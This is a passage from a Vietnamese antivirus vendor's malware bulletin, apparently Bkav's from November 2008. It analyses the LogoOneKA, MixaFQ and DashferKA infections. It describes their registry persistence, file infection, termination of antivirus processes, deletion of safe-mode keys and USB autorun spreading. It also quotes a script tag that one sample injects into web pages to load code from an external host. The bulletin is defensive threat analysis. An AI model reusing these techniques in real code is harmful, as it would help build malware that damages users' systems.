1
Sửa file hosts ngăn không cho người dùng truy
cập vào một vài trang web bảo mật.
Sửa key không cho người dùng sử dụng một vài
tiện ích của windows và làm mất menu
FolderOptions.
Tắt các process và các cửa sổ có chứa 1 trong
các xâu :
peid , task view, telanjang, bugil, cewe, naked, porn,
sex, alwil, wintask,
folder option,worm, trojan, avira, windows script,
commander, pc-media, killer, ertanto,
anti, ahnlab, nod32, hijack, sysinter, aladdin, panda,
trend, cillin,
mcaf, avast, bitdef, machine, movzx, kill, washer,
remove, wscript, diary,
untukmu, kangen, sstray, Alicia, Mariana, Dian, foto,
zlh, Anti, mspatch,
siti, virus, services.com, ctfmon, nopdb, opscan,
vptray, update, lexplorer, iexplorer,
nipsvc, njeeves, cclaw, nvcoas, aswupdsv, ashmaisv,
systray, riyani, xpshare, syslove,
tskmgr, ccapps, ash, avg, poproxy, mcv
Tìm các địa chỉ mail trong máy, đồng thời gửi
mail có đính kèm virus tới các địa chỉ vừa tìm được.
Chuyên viên phân tích : Nguyễn Quốc Nhân
36. Bkav2009 (20/11/2008) cập nhật lần thứ 1:
LogoOneKA, MegabyA
Malware cập nhật mới nhất:
Tên malware: W32.LogoOneKA.PE
Thuộc họ: W32.LogoOne.PE
Loại: PE
Xuất xứ: Trung Quốc
Ngày phát hiện mẫu: 19/11/2008
Kích thước: 61Kb
Mức độ phá hoại: Cao
Nguy cơ:
Ăn cắp thông tin cá nhân.
Lây file
Làm giảm mức độ bảo mật của hệ thống.
Hiện tượng:
Sửa registry.
Dừng các chương trình diệt virus
Làm chậm hệ thống.
Mất icon của các file .exe
Cách thức lây nhiễm:
Phát tán qua trang web, phần mềm miễn phí.
Phát tán qua các tài nguyên chia sẻ mạng nội bộ
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần
mềm crack, hack, các trang web đen, độc hại
2
Không nên mở file đính kèm không rõ nguồn
gốc, đặc biệt là các file có đuôi .exe .com .pif và .bat
Không nên share full các ổ đĩa, thư mục trong
mạng nội bộ, nên đặt password truy cập nếu muốn
chia sẻ quyền sửa và tạo file.
Mô tả kỹ thuật:
Ghi giá trị
"load" = %WinDir%\uninstall\rundl132.exe
vào key
HKLM\Software\Microsoft\Windows\CurrentVersion
\Run để chạy virus mỗi khi windows được khởi động
Kiểm tra đã tồn tại key
[HKLM\SOFTWARE\Soft\DownloadWWW]
với giá trị "auto" = "1" làm dấu hiệu xác định xem
virus lây nhiễm chưa.
Copy chính nó vào
%Windir%\ Logo1_.exe
%Windir%\uninstall\rundl132.exe
Drop ra file: %WinDir%\RichDll.dll
Ghi ngày lây nhiễm vào file C:\_desktop.ini
Lây file bằng cách ghi code virus vào trước file
gốc.
Lây vào toàn bộ các file exe trong ổ cứng từ C
đến Y.
Lây qua mạng nội bộ bằng cách copy và lây vào
các file exe trong các thư mục shared
Không lây những file đường dẫn có chứa:
• \Program Files\
• Common Files
• ComPlus Applications
• Documents and Settings
• InstallShield Installation Information
• Internet Explorer
• Messenger
• Microsoft Frontpage
• Microsoft Office
• Movie Maker
• MSN
• MSN Gaming Zone
• NetMeeting
• Outlook Express
• Recycled
• system
• System Volume Information
• system32
• windows
• Windows Media Player
• Windows NT
• WindowsUpdate
• winnt
Kill các services và chương trình diệt virus:
• "Kingsoft AntiVirus Service"
• EGHOST.EXE
3
• IPARMOR.EXE
• KAVPFW.EXE
• MAILMON.EXE
• mcshield.exe
• RavMon.exe
• RavMonClass
• Ravmond.EXE
• regsvc.exe
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày:
W32.ARPspoofT.Trojan, W32.FarfliKA.Rootkit,
W32.FialaKA.Worm, W32.MegabyA.Worm,
W32.VtLightIA.PE, W32.KxvoET.Worm,
W32.WinbetTT.Trojan, W32.AlureonB.Trojan,
W32.ArfuBot.Trojan, W32.CimusCD.Rootkit,
W32.MSFoxCB.Worm
37. Bkav2011 (21/11/2008) cập nhật lần thứ 1: Suchop,
MixaFQ
Malware cập nhật mới nhất:
Tên malware: W32.MixaFQ.Worm
Thuộc họ: W32Mixa.Worm
Loại: Worm
Xuất xứ: Việt Nam
Ngày phát hiện mẫu: 20/11/2008
Kích thước: 3608Kb
Mức độ phá hoại: Trung bình
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống.
Hiện tượng:
Sửa registry.
Bị logoff máy tính khi sử dụng 1 vài tiện ích của
windows như: TaskMgr, RegistryTool,
Không hiển thị được file ẩn và file hệ thống.
Cách thức lây nhiễm:
Phát tán qua trang web.
Tự động lây nhiễm vào USB.
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần
mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào
biểu tượng ổ đĩa.
Mô tả kỹ thuật:
Ghi giá trị
"Userinit " = %SysDir%\systemio.exe
vào key HKLM\ \CurrentVersion\Winlogon\
và Virus=%WinDir%\Mixa.exe
Vào key HKLM\ \CurrentVersion\Run để virus được
kích hoạt mỗi khi Windows khởi động
4
Copy bản thân thành các file :
%SysDir%\systemio.exe
%WinDir%\Mixa.exe
Liên tục check các process, nếu thấy process có
chứa 1 trong các xâu : taskmgr, procexp, regedit,
mmc thì đóng tất cả các ứng dụng và LogOff máy
tính.
Copy bản thân thành file có tên "Mixa_I.exe"
kèm theo file autorun.inf vào tất cả các ổ đĩa.
Liên tục ghi key làm người dùng không hiện
được các file ẩn và file hệ thống.
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày:
W32.ConthinA.Worm, W32.FialaKC.Worm,
W32.HtmInfectB.Trojan, W32.Suchop.PE,
W32.JvsoftLJ.Worm, W32.JvsoftLK.Worm,
W32.OngameFS.Trojan, W32.RsnetJZ.Trojan,
W32.Lin32.Trojan, W32.Sobicyt.Adware,
W32.Soxpeca.Adware,
38. Bkav2013 - Phát hành lần thứ 1 ngày 22/11/2008,
cập nhật DashferKA, VtLightKA, CkvoHGV,
ResycleB, Cmhot
Malware cập nhật mới nhất:
Tên malware: W32. DashferKA.PE
Thuộc họ: W32.Dashfer.PE
Loại: PE
Xuất xứ: Trung Quốc
Ngày phát hiện mẫu: 21/11/2008
Kích thước: 165Kb
Mức độ phá hoại: Cao
Nguy cơ:
Làm giảm mức độ an ninh của hệ thống.
Hiện tượng:
Sửa registry.
Không vào được chế độ safe mode của Windows.
Xuất hiện popup các trang web tiếng Trung Quốc.
Mất checkbox để hiển thị các file hệ thống.
Cách thức lây nhiễm:
Phát tán qua trang web.
Tự động lây nhiễm qua USB.
Lây qua các file thực thi.
Cách phòng tránh:
Không nên vào các trang web cung cấp các phần
mềm crack, hack, các trang web đen, độc hại
Không nên mở ổ USB bằng cách nháy kép vào
biểu tượng ổ đĩa.
Mô tả kỹ thuật:
Xóa các key :
HKLM\ \Control\SafeBoot\Minimal\{4D36E967-
5
E325-11CE-BFC1-08002BE10318}
HKLM\ \Control\SafeBoot\Network\{4D36E967-
E325-11CE-BFC1-08002BE10318}
làm cho máy tính không khởi động được trong chế độ
safemode.
HKLM\Software\Microsoft\Windows\CurrentVersion
\Run
Copy bản thân thành file có tên "lsass.exe" vào
thư mục %SysDir%\Com, và ~.exe vào thư mục
Startup
để virus được thực thi khi khởi đông hệ thống.
Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus
chạy trên 1 máy.
Dump ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
%SysDir%\Drivers\Alg.exe
Sửa key làm mất checkbox để hiển thị các file
hệ thống.
Copy bản thân thành file có tên : "pagefile.pif"
kèm theo file autorun.inf vào tất cả các ổ đĩa.
Tắt các process có chứa một trong các xâu sau :
rav, avp, twister, kv, watch, kissvc, scan, guard.
Thêm vào cuối các file có đuôi: jsp, php, spx,
asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể
cả trong các file nén .rar) đoạn script :
<script
src="http://js.k01[removed].com/01.asp"></script>
Lây nhiễm vào các file thực thi tìm được trong
máy trừ ổ đĩa hệ thống.
Chuyên viên phân tích : Nguyễn Ngọc Dũng